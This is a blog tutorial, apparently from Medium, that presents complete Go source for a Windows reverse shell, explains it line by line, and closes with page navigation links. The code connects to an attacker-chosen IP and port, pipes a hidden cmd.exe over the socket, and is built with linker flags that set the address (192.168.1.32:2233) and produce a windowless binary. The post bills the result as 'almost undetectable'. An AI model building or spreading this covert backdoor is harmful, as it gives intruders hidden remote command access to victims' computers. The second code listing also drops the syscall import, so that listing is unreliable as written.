Basic reverse shell in golang (almost undetectable, hide cmd window)

package mainimport (      "net"         "os"        "os/exec"      "syscall"
)
  • net is required to establish a connection
  • os is required to call os.Exit()
  • os/exec is required to execute command on the target machine
  • syscall contains an interface to the low-level operating system primitives
var connectString stringfunc main() {if len(connectString) == 0 {os.Exit(1)}
  • var connectString string will be set during the compilation, it is the ip address and the port
conn, err := net.Dial("tcp", connectString)if err != nil {os.Exit(1)}
  • net.Dial connects to the address on the named network, in our case it will be the values into the variable connectString
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
  • cmd := exec.Command(“cmd.exe”) cmd represents an external command being prepared or run, exec.Command execute the command cmd.exe
  • cmd.SysProcAttr we use it to hide the cmd.exe window, this is the key to hide our reverse shell, we will need something else during the compilation !
cmd.Stdin = conncmd.Stdout = conncmd.Stderr = conn
  • Redirection of the inputs and outputs of this process
    to the open connection we initialized above into the “conn” variable.
cmd.Run()
  • cmd.Run() we run the command into the cmd variable
package mainimport (
"net"
"os"
"os/exec"
)
var connectString stringfunc main() {if len(connectString) == 0 {
os.Exit(1)
}
conn, err := net.Dial("tcp", connectString)
if err != nil {
os.Exit(1)
}
cmd := exec.Command("cmd.exe")
cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}
cmd.Stdin = conn
cmd.Stdout = conn
cmd.Stderr = conn
cmd.Run()}
go build --ldflags "-H=windowsgui -X main.connectString=192.168.1.32:2233" reverse.go
  • ldflags change the value of variables at build time and introduce your own dynamic information into a binary
  • -H=windowsgui writes a “GUI binary” instead of a “console binary”
  • -X flag to write information into the variable at link time, followed by the package path to the variable and its new value

--

--

--

Learn with Christian & Alix

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Prologue to Flutter GetX | Development made simple with GetX Plugin

Intro to Git/GitHub

Defining Variables in Golang

Variables in Golang, Scope of variables in Golang, Function Level Variables, Package Level Variables

How much does development of a VR Training application cost?

How to build a scalable WebSocket server?

Motrix is full-featured download manager

How To Choose Between AWS Lambda vs Amazon EC2

LoginRadius Federated Identity Management

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Yoplux

Yoplux

Learn with Christian & Alix

More from Medium

Tran -🖥️ Securely transfer and send anything between computers with TUI.

Dev 101: Shell in a nutshell

How to upgrade Golang version in Linux?

Testing Web Server: Part 2